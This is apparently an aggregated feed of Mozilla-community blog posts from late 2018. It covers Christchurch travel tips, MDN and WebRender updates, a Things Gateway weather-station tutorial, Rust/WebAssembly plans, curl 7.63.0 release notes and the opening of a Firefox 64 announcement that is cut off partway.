Nick Cameron: What to do in Christchurch

LCA 2019 is happening in January in Christchurch (which is a great conference and has a few Rust talks this year). I'm not able to attend, but I am in town, so I hope to meet some of my internet friends (get in touch!).

I thought I'd write down a few things to do in Christchurch for those who are new to the city. Don't get your hopes up for lots of tourist fun though (unless you have time to see some of the surrounding country); it is not the most interesting city, even less so since half of it was flattened in an earthquake. For more ideas, I like the Neat Places website.

Good places to drink coffee

  • C4
  • Coffee Embassy
  • the brunch places below

Good places to drink alcohol

  • The Volsted (near-ish the university)
  • 44 Welles Street

Good places to eat brunch

  • Hello Sunday
  • Unknown Chapter
  • Supreme Supreme (if they re-open in time - they're currently closed for refurbishment)
  • Addington Coffee Co
  • Caffeine Laboratory
  • Black Betty
  • Southside Social

Good places to eat dinner

  • Rangoon Ruby (Burmese)
  • Mumbaiwala (fancy Indian street food)
  • Birkenavala (cheap and delicious Indian)
  • Little High Eatery (hipster food court, lots of options)
  • Mexico (interesting but expensive Mexican food and lots of drinks)
  • Cassels (great pizza and great beer)

Best ice cream

  • Rollickin’ Gelato

Best place to swim

  • Jellie Park - 50m outdoor pool and 2x25m indoor pools. Also a decent gym which you can use without a membership.

Best place to run

  • Hagley Park

Best beach

  • Sumner - it has a good bit of sand plus some surfing and is a nice little beach village

Good places to go nearby

  • Castle Hill (On the way to Arthur's Pass; kind of magical, nature-sculpted boulders to walk amongst)
  • Arthur's Pass national park (Mountains and forests; one of NZ's lesser-visited national parks, but one of my favourites)
  • Akaroa (cute tourist town where you can swim with dolphins; drive there the long way via Governor's Bay for a nice drive, and enjoy food, views, and chocolate at She cafe. If you like cheese, stop at Barrys Bay)

Good things to see and do in town

  • Look at the ruins of the Cathedral and wander around the new city centre.
  • Riccarton House farmers market (Saturday Morning; lots of nice things to eat and drink)
  • Walk in the Port Hills
  • The Buskers Festival (Throughout January, lots of shows)
  • Go to the beach (see above)

Any questions, ping me on twitter - @nick_r_cameron.

Cameron Kaiser: A thank you to Ginn Chen, whom Larry Ellison screwed

Periodically I refresh my machines by dusting them off and plugging them in and running them for a while to keep the disks spinnin' and the caps chargin'. Today was the day to refurbish my Sun Ultra-3, the only laptop Sun ever "made" (they actually rebadged the SPARCle and later the crotchburner 1.2GHz Tadpole Viper, which is the one I have). Since its last refresh the IDPROM had died, as they do when they run out of battery, resetting the MAC address to zeroes and erasing the license for the 802.11b which I never used anyway. But, after fixing the clock to prevent GNOME from puking on the abnormal date, it booted and I figured I'd update Firefox since it still had 38.4 on it. Ginn Chen, first at Sun and later at Oracle, regularly issued builds of Firefox which ran very nicely on SPARC Solaris 10. Near as I can determine, Oracle has never offered a build of any Firefox post-Rust even to the paying customers they're bleeding dry, but I figured I should be able to find the last ESR of 52 and install that. (Amusingly this relic can run a Firefox in some respects more current than TenFourFox, which is an evolved and patched Firefox 45.)

To my consternation, however, there was no contributed build for 52.9, the last 52ESR. I had to walk all the way back to 52.0.2 to find the last Solaris 10 package, which was accompanied by this sad message:

This directory contains Solaris builds of Firefox 52.0.2 ESR, which are contributed by Oracle Solaris Desktop Beijing Team. If you have any problem with these builds, please send email to ginnchen at gmail dot com

This is the last contrib build before I leave Oracle.
My job is eliminated.
Thanks everyone for supporting me.
ginnchen@...

I don't know if anyone ever said to Ginn how much all that work was appreciated. Well, I'm saying it now. I hope for much greener pastures away from scum like Larry, who ruined Sun, Solaris and SPARC just by being his scummy self, and lays off good folks just so he can buy another island. Here is Ginn's last build:

To this day, in Solaris 11, Firefox 52.9 is the last Firefox available, probably using Ginn's work.

Hacks.Mozilla.Org: MDN Changelog for November 2018

Done in November

Here’s what happened in November to the code, data, and tools that support MDN Web Docs:

Here’s the plan for December:

Shipped monthly MDN payments

In September we launched MDN payments, giving MDN fans a new way to help MDN grow. On November 20th, we added the ability to schedule monthly payments.

A screenshot of the monthly payment banner, with $8/month selected.

Monthly payment banner on MDN

Potato London started work on this shortly after one-time payments launched. We kicked it off with a design meeting where we determined the features that could be delivered in 4 weeks. Potato and MDN worked closely to remove blockers, review code (in over 25 pull requests), and get it into the staging environment for testing. Thanks to everyone’s hard work, we launched a high-quality feature on schedule.

We’ve learned a lot from these payment experiments, and we’ll continue to find ways to maintain MDN’s growth in 2019.

Converted from Font Awesome to SVG

On November 6th, we deployed Schalk Neethling’s PR 5058, completing the transition from the FontAwesome webfont to inline SVG icons. There are a few icon and style changes, but the site should look the same to most users.

Different styles of notice banners with icons from MDN, showing the old Font Awesome banners on the left and the new SVG banners on the right

Banners with indicators before the change (left) and after converting to SVG

We had several reasons for this change in April, when Schalk started the project. The biggest gains were expected to be in performance and a simpler design. Over the year, we became aware that many content blockers prevent loading web fonts, and many users couldn't see UIs that depended on icons. For example, the browser compatibility tables were unusable on mobile with Firefox Focus. Switching to inline SVG fixes this issue.

We haven’t seen a significant performance improvement, although there may have been small improvements as this switch was rolled out over the year. This month, we explored some more radical changes, such as minimal styling and disabled JS, by shipping manually edited copies of wiki pages. These experiments will help us determine the highest impact changes for front-end performance, and provide insight into what areas to explore next.

Added browser names to compatibility tables

The new SVG icons are being used in the browser compatibility table. In the wider desktop view, we’ve added rotated browser labels (Kuma PR 5117 and KumaScript PR 997), so it is clearer which browser is which. We also launched a survey to ask visitors about their needs for compatibility data (Kuma PR 5133).

A screenshot of a compatibility table with rotated text labels and topped with a survey

The compatibility table for display has gotten even taller

The compatibility data continues to be released as an NPM package, and now a tagged release is also created, including the statistics and notable changes from the last release (BCD PR 3158).

Welcome David Flanagan

David Flanagan joined the MDN development team in November. David is the author of JavaScript: The Definitive Guide and several other books. He is a former Mozilla employee, and recently worked at Khan Academy. His skills and passions are a great fit for MDN’s mission, and we look forward to his help as we modernize and expand our tech stack. Welcome David!

Shipped tweaks and fixes

There were 248 PRs merged in November:

This includes some important changes and fixes:

35 pull requests were from first-time contributors:

Planned for December

Meet in Orlando

Twice a year, all of Mozilla comes together for an All-Hands meeting. This winter’s All-Hands is in Orlando, Florida. We were in Orlando in December 2015, when Florian was proposing moving KumaScript macros to GitHub and I was deploying the BrowserCompat API to beta users. A lot changes in three years!

Many of us at MDN will be taking well-deserved breaks after the All-Hands, and will come back refreshed for 2019. We hope you and yours have an enjoyable winter break!

The post MDN Changelog for November 2018 appeared first on Mozilla Hacks - the Web developer blog.

K Lars Lohn: Things Gateway - a Virtual Weather Station

Today, I'm going to talk about creating a Virtual Weather Station using the Things Gateway from Mozilla and a developer account from Weather Underground.  The two combined enable home automation control based on weather conditions like temperature, wind, and precipitation.

I've already written the code and this blog is about how to use it.  In the next blog posting, I'll talk about how the code actually works.


Goal: create a virtual Web thing to get weather data into the Things Gateway for use in rules.  Specifically, make a rule that turns a green light on when the wind speed is high enough to fly a kite.

What you'll need:

  • an RPi running the Things Gateway
    What's it for? It's our target to have the weather station provide values to the Things Gateway.
    Where I got it: General Download & Install Instructions, or see my own install instructions: General Install & Zigbee setup, Philips Hue setup, IKEA TRÅDFRI setup, Z-Wave setup, TP-Link setup
  • a laptop or desktop PC
    What's it for? The machine to run the Virtual Weather Station. You can use the RPi itself.
    Where I got it: My examples will be for a Linux machine.
  • a couple of things set up on the Things Gateway to control
    What's it for? This could be bulbs or switches.
    Where I got it: I'm using Aeotec Smart Switches to run red and green LED bulbs.
  • the webthing and configman Python 3 packages
    What's it for? These are libraries used by the Virtual Weather Station.
    Where I got it: See the pip install directions below.
  • a clone of the pywot github repository
    What's it for? It is where the Virtual Weather Station code lives.
    Where I got it: See the git clone directions below.
  • a developer key for online weather data
    What's it for? This gives you the ability to download data from Weather Underground.
    Where I got it: It's free from Weather Underground.

Step 1: Download and install the configman and webthing Python 3 packages.  Clone the pywot github repository in a local directory appropriate for software development. While this can be done directly on the RPi, I'm choosing to use my Linux workstation. I like its software development environment better.
        
$ sudo pip3 install configman
$ sudo pip3 install webthing
$ git clone https://github.com/twobraids/pywot.git
$ cd pywot
$ export PYTHONPATH=$PYTHONPATH:$PWD
$ cd demo


So what is configman?

This is an obscure library for configuration that I wrote years and years ago.  I continue to use it because it is really handy.  It combines command line, config files, the environment or anything conforming to the abstract type collections.Mapping to universally manage program configuration.  Configuration requirements can be spread across classes and then used for dynamic loading and dependency injection.  For more information, see my slides for my PyOhio 2014 talk: Configman.

What is webthing?

webthing is a Mozilla package for Python 3 that implements the Web Thing API.  It provides a set of classes that represent devices and their properties, giving them an implementation that can be controlled over an HTTP connection.

What is pywot?

pywot is my project to create a wrapper around webthing that offers a more Pythonic interface than webthing does alone.  webthing closely follows a reference implementation written in JavaScript, so it offers an API with a distinctly different idiom than most Python modules.  pywot is an attempt to pave over the idiomatic differences.

Step 2:  In the …/pywot/demo directory, there are several example files.  virtual_weather_station.py is our focus today.  In this posting, we're just going to run it, then we'll tear it apart and analyze it in the next posting.

Get a developer account for Weather Underground.  Take note of the API key they assign to you.  You'll need it in the next step.

Step 3: Using your WU API key, your city and state, run the program like this:
        
$ ./virtual_weather_station.py -K YOUR_WU_API_KEY --city_name=Missoula --state_code=MT



Step 4: We're going to assume that there are two light bulbs already configured and named: Red and Green.  Add the virtual weather station to the Things Gateway by pressing the "+" key.


Sometimes, I've noticed that the Things Gateway doesn't immediately find my Virtual Weather Station.  I've not nailed it down as to why, but something about mDNS on my network can be very slow to update - sometimes up to ten minutes.  In this case, you don't have to wait, just press "Add by URL..." and then enter the IP address of the machine running the Virtual Weather Station with this URL template: "http://IP_ADDRESS:8888"

Step 5: The Virtual Weather Station is now fetching weather data every five minutes (as controlled by the configuration value called seconds_between_polling; you can change that on the command line).  The Things Gateway should have that data immediately: press the "splat" on the "THING" icon for the weather station:


Step 6: Now we can make a rule to turn on the "Green" light whenever the wind speed exceeds the minimum rated speed for our kite.

Select RULES from the drop down menu.  Drag the Weather Station up into the top half of the screen; select "Wind Speed" from the drop down box; change the "<" to ">"; use the up/down buttons to set the minimum wind speed threshold.  I'm choosing 5.


Step 7: Drag the "Green" light into the other half of the blank pane, use the drop down box to select the "ON" property.


Step 8: Go to the top of the page, give your rule a useful name, press <enter>, and then use the left arrow to leave the rule editor.

Step 9:  You've now seen how to make a rule based on properties of the Weather Station.  Your task is to now make the rule for the Red light.  I made mine turn on the red light when the wind is less than 5mph - I call that calm winds.  You can make your red light rule do whatever you want.

That should be about it.

Remember that making a rule implies the creation of a converse rule.  The rule that I made above says the Green light should come on when the wind speed is greater than 5mph.  The converse rule says that when the wind speed is below 5mph, the light will go out.

If the wind speed was greater than five at the moment that the rule was created, there may be some counterintuitive behavior.  It appears that rules aren't applied immediately as they're created.  They trigger on an "event" that happens when a property changes value.  If the wind was greater than 5mph when the rule was created, the rule didn't yet exist when the "event" happened.  The kite light will still work once the wind speed changes again at the next five minute polling point.  Be patient.


Bonus Step:  Want to run the Virtual Weather Station, but don't want to include the WU API key on the command line?  Try this:
        
$ ./virtual_weather_station.py -K YOUR_WU_API_KEY --admin.dump_conf=config.ini

That created a config file called ./config.ini
Open up ./config.ini in an editor and uncomment the line that has your WU API key. Save the file.  You can specify the config file on the command line when you run the Virtual Weather Station.  Any of the parameters can be loaded from the ini file.
        
$ ./virtual_weather_station.py --admin.conf=config.ini --city_name=Missoula --state_code=MT

Still too much typing? Instead of the config file, you could just set any/all of the parameters as environment variables:
        
$ export weather_underground_api_key=YOUR_WU_KEY
$ export city_name=Missoula
$ export state_code=MT
$ ./virtual_weather_station.py


In my next blog post, I'm going to explain the code that runs the Virtual Weather Station in great detail.

Andrew Halberstadt: Taskgraph Like a Pro

Have you ever needed to inspect the taskgraph locally? Did you have a bad time? Learn how to inspect the taskgraph like a PRO. For the impatient skip to the installation instructions below.


Will Kahn-Greene: Socorro: migrating to Python 3

Summary

Socorro is the crash ingestion pipeline for Mozilla's products like Firefox. When Firefox crashes, the Breakpad crash reporter asks the user if the user would like to send a crash report. If the user answers "yes!", then the Breakpad crash reporter collects data related to the crash, generates a crash report, and submits that crash report as an HTTP POST to Socorro. Socorro saves the crash report, processes it, and provides an interface for aggregating, searching, and looking at crash reports.

This blog post talks about the project migrating Socorro to Python 3. It covers the incremental steps we did and why we chose that path plus some of the technical problems we hit.

Read more… (16 mins to read)

QMO: Firefox 65 Beta 6 Testday, December 21st

Hello Mozillians,

We are happy to let you know that on Friday, December 21st, we are organizing Firefox 65 Beta 6 Testday. We'll be focusing our testing on <notificationbox> and <notification> changes and UpdateDirectory.

Check out the detailed instructions via this etherpad.

No previous testing experience is required, so feel free to join us on #qa IRC channel where our moderators will offer you guidance and answer your questions.

Join us and help us make Firefox better!

See you on Friday!

Nick Fitzgerald: Rust and WebAssembly in 2019

Compiling Rust to WebAssembly should be the best choice for fast, reliable code for the Web. Additionally, the same way that Rust integrates with C calling conventions and libraries on native targets, Rust should also integrate with JavaScript and HTML5 on the Web. These are the Rust and WebAssembly domain working group’s core values.

In 2018, we made it possible to surgically replace performance-sensitive JavaScript with Rust-generated WebAssembly.

I propose that we make larger-scale adoption of Rust and WebAssembly practical in 2019.

#RustWasm2019: To provide some context for this blog post, the Rust and WebAssembly domain working group is currently soliciting proposals for its 2019 roadmap. This is my proposal. I encourage you to add your voice to the discussion as well!

A Rising Tide Lifts All Boats

We should build a toolkit of loosely coupled libraries that make Rust and WebAssembly development practical. Whether you are carefully inserting a small wasm module into an existing JavaScript system, architecting a large wasm module, or starting a green-field Web application, this toolkit should make you productive.

People use high-level libraries and frameworks instead of using Web APIs directly because they want abstractions with which they can naturally express themselves. For example:

  • I prefer describing how I want the DOM to look right now, rather than enumerating a list of modifications that will transform its current state into my desired state.
  • I prefer thinking in terms of Rust types, not about the raw, serialized bytes in a fetched HTTP response body or about object stores in Indexed DB.

In order to rise to that level of abstraction, we will need a diverse set of libraries for the various capabilities the Web exposes:

  • Networking, fetch, and WebSockets
  • Working with forms and <input>
  • Timers and setTimeout
  • Web GL and Web Audio
  • Persistent client storage with Indexed DB
  • A console.log-based backend for env_logger and the Rust logging facade
  • URL routing and window.history
  • Custom elements and Web components
  • Etc…

In 2018, we made using all of these things possible: you can access the underlying JavaScript and Web APIs directly via wasm-bindgen, js-sys and web-sys, but this is equivalent to programming against the libc crate directly. In 2019, we should create higher-level abstractions that wrap the raw, underlying API to yield a better experience that is ultimately more practical. Green-field Rust and WebAssembly applications would use an umbrella crate that connects the whole toolkit together and re-exports its individual crates. Small, targeted wasm modules that are integrating back into an existing JavaScript application would pick and choose relevant libraries from the toolkit instead of depending upon the whole umbrella crate.
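
To make the "libc level" concrete, here is a minimal sketch (my own illustration, not from the original post) of what talking to the DOM through the raw web-sys bindings looks like today. It assumes a wasm-bindgen project with the relevant web-sys cargo features (Window, Document, Element, Node, HtmlElement) enabled; every step is an explicit, fallible call, which is exactly the boilerplate a higher-level toolkit would hide.

use wasm_bindgen::prelude::*;

// Append a paragraph to the page using the raw web-sys bindings.
// Each lookup returns an Option or Result that we unwrap by hand.
#[wasm_bindgen(start)]
pub fn run() -> Result<(), JsValue> {
    let window = web_sys::window().expect("no global window");
    let document = window.document().expect("window has no document");
    let body = document.body().expect("document has no body");

    let p = document.create_element("p")?;
    p.set_text_content(Some("Hello from Rust and WebAssembly!"));
    body.append_child(&p)?;

    Ok(())
}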

We should collectively build these higher-level libraries and the toolkit’s umbrella crate that connects them together. There is a ton of room here for contributors to step up and provide leadership for a particular component library. This toolkit and all of its crates should reflect our working group’s core values:

  • Fast: Let’s show everyone how fast the Web can be ;-) Zero-cost abstractions from the ground up. No wandering off the happy path to fall off a performance cliff. No frames dropped.

  • Reliable: One of the things that I love about the Rust community is the high standards we hold ourselves to, in particular for correctness. We should leverage Rust’s type system to enforce correctness, write property-based tests with quickcheck, and have comprehensive integration tests running in headless browsers. We intend to build a solid foundation, and there shouldn’t be reason to question its structural integrity.

  • Excellent integration with JavaScript and the Web: We must empower incremental Rust and WebAssembly adoption: rewriting from scratch is not practical. Plus, there is a bunch of JavaScript code that wouldn’t make sense to rewrite in Rust because it is just fine right now.

In addition to supporting our core values, our toolkit should also be:

  • Modular: Take or leave any individual crate from the toolkit. We do not want to build a monolithic, walled garden! The goal is to amplify sharing, compatibility, and improvements; reducing effort duplication across the blossoming Rust and WebAssembly ecosystem.

  • Ergonomic: Rust’s abstractions are not only zero-cost, they are also expressive! We should leverage this to build APIs that are a joy to work with. The glium crate is an excellent example of transmuting a beautiful Rust crate from a crufty API that was not designed for the Rust language.

Some of the aforementioned Web APIs are already wrapped up into high-level APIs in crates that already exist. However, few of the extant crates fulfill all of our requirements. Most commonly they are lacking modularity: we’ve seen more “frameworks” than single-purpose libraries collected into “toolkits”. Nonetheless, we should collaborate to improve existing crates and tease them apart into small, single-purpose libraries where it makes sense and everyone is on board.

Finally, the inspiration for this idea of developing a loosely coupled toolkit comes from the Rust Networking domain working group’s Tide project, and also from the Choo JavaScript project. Thanks!

Tooling

Right now, wasm-pack will orchestrate your building and testing workflows, and generate a package.json file to help you integrate with JavaScript tooling. It will publish your Rust-generated WebAssembly package to NPM, making distribution easy.

But there are a few things that we intended to include in 2018 that didn’t quite make the cut:

  • Integrating and automating execution of the binaryen project’s wasm-opt tool.
  • Support for generating a single NPM package that will work both on the Web and in Node.js.
  • Allowing a library crate X to declare that it has a runtime dependency on an external NPM package, and have that reflected in the package.json that wasm-pack produces for some crate Y that transitively depends on X.
  • Including local assets (notably JavaScript snippets) into wasm-pack’s generated NPM package. Again, with support for crates that are transitively depended upon.

I suspect the latter two items in particular will be necessary for building out the toolkit.

We should finish these tasks and polish wasm-pack into a 1.0 tool. Following that, we should let experience and necessity guide our efforts.

One final note on tooling: Internet Explorer 11 is the last browser that still has non-trivial market share and doesn’t support wasm. It is mostly possible to support IE11 by using the binaryen project’s wasm2js tool to compile our wasm into JavaScript. But wasm2js is still missing some core functionality, and the whole experience of writing a Rust and wasm app while also supporting IE11 is far from turnkey. Because this is so important for actually shipping a Rust and wasm project, we shouldn’t leave this problem for users to solve via integration with external tooling: we should build support for it into our toolchain. This way we can provide that turnkey experience, and make sure that all wasm code that our toolchain emits is fully supported on Internet Explorer 11.

Multithreading

We must bring Rust’s fearless concurrency to the Web!

Of the languages (C, C++, and Rust) that can use shared memory threading on the Web, only Rust can safely do so. The Web APIs necessary for multithreading are stabilizing and will be enabled by default in browsers soon. We should be ready.

However, we can’t just make std::thread work transparently in wasm, due to the nature of the APIs the Web platform is exposing. For example, we can’t block the event loop indefinitely, even in a worker thread, and we need to change the global allocator to avoid waiting on locks on the main thread. See Alex’s excellent Multithreading Rust and WebAssembly write up for details.

Therefore, I think this multithreading effort will mostly involve creating a thread pool library for the whole wasm ecosystem to share, and then building channels and other concurrency abstractions on top of it. We should also get support for wasm threading and our thread pool library upstream into crates like rayon as well. This isn’t actually that different from the library and toolkit work, but it is worth singling out due to its scale, the unique nature of the problem domain, and what a huge game changer multithreading on the Web will be.
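
As a concrete, hedged illustration of the developer experience this is aiming for, here is the kind of data-parallel code that already works natively with rayon today; the point of the thread pool and upstreaming work described above is that this same code should eventually run on a multithreaded wasm target.

use rayon::prelude::*;

// Embarrassingly parallel work: rayon splits the slice across its
// thread pool and sums the partial results.
fn sum_of_squares(input: &[i64]) -> i64 {
    input.par_iter().map(|&x| x * x).sum()
}

fn main() {
    let data: Vec<i64> = (0..1_000_000).collect();
    println!("sum of squares = {}", sum_of_squares(&data));
}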

#RustWasm2019

I think 2019 holds a very bright future for Rust and WebAssembly.

Mozilla GFX: WebRender newsletter #33

Hi! The newsletter skipped a week because of Mozilla’s bi-annual allhands which took place in Orlando last week. We’ll probably skip a few others in December as a lot of the gfx folks are taking some time off. Before I get to the usual change list, I’ll continue answering the questions nic4r asked in the 31st newsletter’s comment section:

Is the interning work Glenn is doing related to picture caching?

Yes indeed. In order for picture caching to work across displaylists we must be able to detect what did not change after a new displaylist arrives. The interning mechanism introduced by Glenn in #3075 gives us this ability in addition to other goodies such as de-duplication of interned resources and less CPU-GPU data transfer.

What is blob tiling and what does it offer above normal blob rendering?

Tiling blobs means splitting blobs into square tiles. For very large blobs this means we can lazily rasterize tiles as they come into the viewport without throwing away the rest, instead of either rasterizing excessively large blob images in one go or clipping the blob against the viewport and re-rasterizing everything during scrolling as the bounds of the blob change. It also lets us rasterize tiles in parallel.

Is there a bug to watch some of the document splitting work going on? My understanding is that document splitting will make the chrome more resilient against slow scene builds in the content frame? Is this right? How does this compare to push_iframe in the DL.

You can look at bug 1441308 although it doesn’t contain a lot of updates. In a nutshell, the bulk of the Gecko side work is done and there are WebRender side adjustments and some debugging to do. Currently WebRender can nest displaylists from different sources (content, UI, etc) by nesting iframes into a single document. Any change to the document more or less causes it to be re-rendered entirely (modulo caching optimizations).

Separating the UI and web content into separate documents mostly means we will update them independently and updating one won’t cause the other to be re-built and re-rendered. It will also let us render the two in separate OS compositor windows.

One of the most complicated aspects of this is probably due to the way the browser is structured to nest the web content within the UI (there is both a background behind the web content and elements on top of it that belong to the UI). A lot of the work that went into this was to be able to split without introducing a lot of overdraw (needlessly allocating texture space for the background behind the web content and drawing it).

OMTA for color, gradients, etc? How much more of CSS can be feasibly calculated off thread and fed to WR using its Property Binding infra?

Anything is possible given enough time and motivation but with WebRender’s current architecture, any of the data that is fed directly to the shaders is a good candidate for animated property bindings. Colors are particularly appealing because it is the most commonly animated CSS property that we don’t already run as an off-main-thread animation (I don’t have the data handy though). We’ll likely tackle these nice perf optimizations after WebRender is shipped and stable.

Notable WebRender and Gecko changes

  • Bobby overhauled WebRender shader cache.
  • Bobby switched non-WebRender’s AWSY test to VMs with GPUs.
  • Kats made some Android improvements.
  • Kats made some progress on the Windows CI work.
  • Kvark removed some memcpys leading to a 5% improvement on dl_mutate.
  • Kvark improved the render target allocation scheme, improving GPU times and VRAM consumption on a lot of sites.
  • Matt added new telemetry.
  • Andrew fixed a few regressions from animated image recycling.
  • Andrew, Kvark, and Nical chased a crash caused by two race conditions and landed two fixes.
  • Emilio fixed transform flattening.
  • Emilio enabled warning-as-errors for rust code in CI.
  • Glenn fixed the way we track frame ids.
  • Glenn fixed eager texture cache eviction.
  • Glenn added support for picture caching.
  • Glenn started a series of changes removing clips expressed in local space, which cause over-invalidation of interned primitives and prevent picture caching from working effectively across displaylist changes. See also (1), (2), (3), (4), (5).
  • Glenn added memory profile counters for interning.
  • Glenn moved the picture caching tiles to the opaque pass.
  • Sotaro removed some dead code.
  • Sotaro fixed a shutdown crash on Linux.
  • Timothy hooked up proper scale selection.

Ongoing work

  • Bobby is adding lazy initialization to D3D11 and D2D outside the GPU process to save memory.
  • Jeff and Nical are working on blob recoordination.
  • Matt is working on avoiding rendering changes within zero-opacity elements.
  • Matt is making WebRender’s behavior more similar to non-WebRender’s during catch-up compositing to make comparison easier.
  • Lee continues tracking down font-related crashes and rendering issues with very large text.
  • Emilio is dreaming of 3d transforms (I believe he actually used the term “nightmare”).
  • Sotaro is investigating SVG rendering bugs.

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

Nick Fitzgerald: Rust Raps

🔥🔥🔥

Just released: the hot new single “Ferris Crab (Rust Raps 2018 Edition)” by Rusta Rhymes off their upcoming debut album impl Drop for Mic {}.

🔥🔥🔥

Listen

Download

Lyrics

(Intro)

My friend with the gift of gab? Ferris Crab.

(Verse 1)

One of my crates got a lot of fly traits
Twenty “i” eight edition? My decision: time to migrate
I’m getting irate at all the excess unsafe
wait — backtrace

We got a cute crab, which is the best crate?
That’s up for grabs. GitHub or Phab-
ricator, review my pull now or later
Hit @bors with the r+ and you’ll be my saviour

And when I’m coming through, I got a cargo too
Reaction to wasm? Domain working group
If you need a regex, BurntSushi is your dude
But if you need a Future well we also got a few

Popping off this Vec like a pimple
And you know that the block I’m from is an impl
So if I talk about an IR, no it’s not GIMPLE
Only rustc MIR, just that simple

(Chorus)

Thought there’d never be a Rust Rap?
Turns out this is just that
impl newsletter #RustFacts
Ferris Crab, that’s a must have
Data race, we gon’ bust that
Mem unsafe, we gon’ bust that
This the first and only Rust Rap
Ferris Crab, that’s a must have

(Verse 2)

If you never borrow check, then you’re gonna get wrecked
Pull out gdb cause you need to inspect out-of-bounds index
Oh guess what’s next?
Use after free turns out it’s gonna be

Or… just use the rustc
And you’ll be flushing all of these bugs down the drain
Gushing super fast code from your brain
No dusting: quite easy to maintain

What’s the secret sauce? It’s all zero cost
Couldn’t do it better if your boss
Demand you try to do it all by hand, but why?
Hate to be that guy, but generics monomorphize

Don’t use a while loop, i < n
Use an Iterator: much better by ten
And when you have a dozen eggs don’t start counting hens
But me and Ferris Crab: best friends to the end

(Chorus)

Thought there’d never be a Rust Rap?
Turns out this is just that
impl newsletter #RustFacts
Ferris Crab, that’s a must have
Data race, we gon’ bust that
Mem unsafe, we gon’ bust that
This the first and only Rust Rap
Ferris Crab, that’s a must have

(Outro)

My friend with the gift of gab? Ferris Crab.

Daniel Stenberg: 7.63.0 – another step down the endless path

This curl release was developed and put together over a period of six weeks (two weeks less than usual). This was done to accommodate my personal traveling plans – and to avoid doing a release too close to Christmas in case we would ship any security fixes, but ironically, we have no security advisories this time!

Numbers

the 178th release
3 changes
42 days (total: 7,572)
79 bug fixes (total: 4,837)
122 commits (total: 23,799)
0 new public libcurl functions (total: 80)
1 new curl_easy_setopt() option (total: 262)
0 new curl command line options (total: 219)
51 contributors, 21 new (total: 1,829)
31 authors, 14 new (total: 646)
0 security fixes (total: 84)

Changes

With the new CURLOPT_CURLU option, an application can now  pass in an already parsed URL to libcurl instead of a string.

When using libcurl’s URL API, introduced in 7.62.0, the result is held in a “handle” and that handle is what now can be passed straight into libcurl when setting up a transfer.

In the command line tool, the --write-out option got the ability to optionally redirect its output to stderr. Previously it was always a given file or stdout, but many people found that a bit limiting.

Interesting bug-fixes

Weirdly enough we found and fixed a few cookie related bugs this time. I say “weirdly” because you’d think this is functionality that’s been around for a long time and should’ve been battle tested and hardened quite a lot already. As usual, I’m only covering some bugs here. The full list is in the changelog!

Cookie saving –  One cookie bug that we fixed was related to libcurl not saving a cookie jar when no cookies are kept in memory (any more). This turned out to be a changed behavior due to us doing more aggressive expiry of old cookies since a while back, and one user had a use case where they would load cookies from a cookie jar and then expect that the cookies would update and write to the jar again, overwriting the old one – although when no cookies were left internally it didn’t touch the file and the application thus reread the old cookies again on the next invoke. Since this was subtly changed behavior, libcurl will now save an empty jar in this situation to make sure such apps will note the blank jar.

Cookie expiry – For the received cookies that get ‘Max-Age=0’ set, curl would treat the zero value the same way as any number and therefore have the cookie continue to exist during the whole second it arrived (time() + 0 basically). The cookie RFC is actually rather clear that receiving a zero for this parameter is a special case and means that it should rather expire it immediately and now curl does.

Timeout handling – when you call curl_easy_perform() to do a transfer and ask libcurl to time out that transfer after, say, 5.1 seconds, and the transfer hasn’t completed in that time while the connection is in fact totally idle, a recent regression would make libcurl not figure this out until a full 6 seconds had elapsed.

NSS – we fixed several minor issues in the NSS back-end this time. Perhaps the most important issue was if the installed NSS library has been built with TLS 1.3 disabled while curl was built knowing about TLS 1.3, as then things like the ‘--tlsv1.2’ option would still cause errors. Now curl will fall back correctly. Fixes were also made to make sure curl again works with NSS versions back to 3.14.

OpenSSL – session resumption works differently with TLS 1.3 than with earlier TLS versions, and now curl supports it with OpenSSL as well.

snprintf – curl has always had its own implementation of the *printf() family of functions for portability reasons. First, traditionally snprintf() was not universally available but then also different implementations have different support for things like 64 bit integers or size_t fields and they would disagree on return values. Since curl’s snprintf() implementation doesn’t use the same return code as POSIX or other common implementations we decided we shouldn’t use the same name so that we don’t fool readers of code into believing that they are fully compatible. For that reason, we now also “ban” the use of snprintf() in the curl code.

URL parsing – there were several regressions from the URL parsing news introduced in curl 7.62.0. That is the first release that offers the new URL API for applications, and we also then switched the internals to use that new code. Perhaps the funniest error was how a short name plus port number (hello:80) was accidentally treated as a “scheme” by the parser, and since the scheme was unknown the URL was rejected. The numerical IPv6 address parser was also badly broken – I take the blame for not writing good enough test cases for it, which made me not realize this in time. Two related regressions that came from the URL work broke HTTP Digest auth and some LDAP transfers.

DoH over HTTP/1 – DNS-over-HTTPS was simply not enabled in the build if HTTP/2 support wasn’t there, which was an unnecessary restriction and now h2-disabled builds will also be able to resolve host names using DoH.

Trailing dots in host name – an old favorite subject came back to haunt us and starting in this version, curl will keep any trailing dot in the host name when it resolves the name, and strip it off for all the rest of the uses where the name will be passed in: for cookies, for the HTTP Host: header and for the TLS SNI field. This, since most resolver APIs makes a difference between resolving “host” compared to “host.” and we wouldn’t previously acknowledge or support the two versions.

HTTP/2 – When we enabled HTTP/2 by default for more transfers in 7.62.0, we of course knew that could force more latent bugs to float up to the surface and get noticed. We made curl understand the HTTP_1_1_REQUIRED error when received over HTTP/2 and then retry over HTTP/1.1, and if NTLM is selected as the authentication to use, curl now forces HTTP/1 use.

Next release

We have suggested new features already lined up waiting to get merged so the next version is likely to be called 7.64.0 and it is scheduled to happen on February 6th 2019.

Hacks.Mozilla.Org: Firefox 64 Released

Firefox 64 is available today! Our new browser has a wealth of exciting developer additions both in terms of interface features and web platform features, and we can’t wait to tell you about them. You can find out all the news in the sections below — please check them out, have a play around, and let us know your feedback in the comment section below.

New Firefox interface features

Multiple tab selection

We’re excited to introduce multiple tab selection, which makes it easier to manage windows with many open tabs. Simply hold Control (Windows, Linux) or Command (macOS) and click on tabs to select them.

Once selected, click and drag to move the tabs as a group — either within a given window, or out into a new window.

Devtools improvements

Our Developer Tools also gained a notable new feature: when hovering over text, the Accessibility Inspector now displays text contrast ratios in the pop-up infobar.

An element is selected by the Accessibility Inspector, and the highlighter shows an AA contrast ratio

The infobar also indicates whether or not the text meets WCAG 2.0 Level AA or AAA accessibility guidelines for minimum contrast.

Another great addition is related to Responsive Design Mode — device selection is now saved between sessions.

New CSS features in 64

